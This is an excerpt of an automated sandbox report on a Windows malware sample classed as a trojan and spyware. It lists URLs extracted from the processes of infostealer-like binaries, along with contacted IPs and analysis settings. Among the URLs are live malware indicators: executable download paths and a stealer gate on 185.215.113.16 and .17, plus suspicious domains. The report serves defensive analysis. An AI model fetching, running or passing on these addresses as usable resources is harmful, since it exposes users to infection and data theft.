                                                                    http://anglebug.com/4722chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://checkout.steampowered.com/new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://185.215.113.17/2fb6c2cc8dce150a.phpEdgestealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngnew_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://185.215.113.16/off/def.exenew_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2784699735.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2779671424.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://185.215.113.16/owsaxplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=englinew_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php?stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://html4/loose.dtdOffnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    unknown
                                                                                    http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllwastealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://anglebug.com/3502chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://anglebug.com/3623chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://anglebug.com/3625chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://anglebug.com/3624chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://help.steampowered.com/en/new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://anglebug.com/3862chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://cdn.discordapp.com/axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://anglebug.com/4836chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://issuetracker.google.com/issues/166475273chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://ch.search.yahoo.com/favicon.icochrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://185.215.113.17/2fb6c2cc8dce150a.phpYstealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englisnew_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://villagedguy.cyou/snew_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vnew_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://x1.c.lencr.org/0new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://x1.i.lencr.org/0new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://anglebug.com/3970chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://185.215.113.16/dobre/random.exe9axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://steamcommunity.com/workshop/new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://support.mozilla.org/products/firefoxgro.all550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://.jpgOffnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                            unknown
                                                                                                            https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://185.215.113.17/f1ddeb6592c03206/freebl3.dll;fx#stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=ennew_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/Rnew_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://anglebug.com/5901chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://anglebug.com/3965chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://anglebug.com/7161chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://anglebug.com/7162chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://anglebug.com/5906chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://anglebug.com/2517chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://anglebug.com/4937chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://issuetracker.google.com/166809097chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://villagedguy.cyou/6new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://185.215.113.16/steam/random.exe5Iaxplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://lens.google.com/v3/uploadchrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703422989.0000229800744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2269345057.00002298006EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://necklacedmny.store/550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2398275478.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345731366.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3087852951.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://anglebug.com/3832chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://www.google.com/complete/chrome.exe, 0000002B.00000002.2773346174.00002B3C00E24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://api.steampowered.com/new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://store.steampowered.com/mobilenew_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctastealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://anglebug.com/6651chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://185.215.113.16/Jo89Ku7d/index.phpdedCdaxplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        1.1.1.1
                                                                                                                                        unknownAustralia
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        185.215.113.36
                                                                                                                                        unknownPortugal
                                                                                                                                        206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                        2.59.161.36
                                                                                                                                        unknownRussian Federation
                                                                                                                                        44676VMAGE-ASRUfalse
                                                                                                                                        20.101.57.9
                                                                                                                                        unknownUnited States
                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                        185.215.113.16
                                                                                                                                        unknownPortugal
                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                        172.67.154.113
                                                                                                                                        unknownUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        185.215.113.17
                                                                                                                                        unknownPortugal
                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                        162.159.133.233
                                                                                                                                        unknownUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        188.114.97.3
                                                                                                                                        unknownEuropean Union
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        239.255.255.250
                                                                                                                                        unknownReserved
                                                                                                                                        unknownunknownfalse
                                                                                                                                        104.102.49.254
                                                                                                                                        unknownUnited States
                                                                                                                                        16625AKAMAI-ASUSfalse
                                                                                                                                        184.28.90.27
                                                                                                                                        unknownUnited States
                                                                                                                                        16625AKAMAI-ASUSfalse
                                                                                                                                        IP
                                                                                                                                        127.0.0.1
                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1546540
                                                                                                                                        Start date and time:2024-11-01 05:01:11 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 15m 24s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:53
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:file.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@93/82@0/13
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 40%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 57%
                                                                                                                                        • Number of executed functions: 123
                                                                                                                                        • Number of non-executed functions: 179
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                        • Execution Graph export aborted for target axplong.exe, PID 7468 because there are no executed function
                                                                                                                                        • Execution Graph export aborted for target axplong.exe, PID 7616 because there are no executed function
                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 5740 because it is empty
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                        TimeTypeDescription
                                                                                                                                        01:23:03API Interceptor29393x Sleep call for process: axplong.exe modified
                                                                                                                                        01:23:06API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                        01:23:28API Interceptor11x Sleep call for process: new_v8.exe modified
                                                                                                                                        01:23:34API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                        01:23:35API Interceptor3032x Sleep call for process: Jurisdiction.pif modified
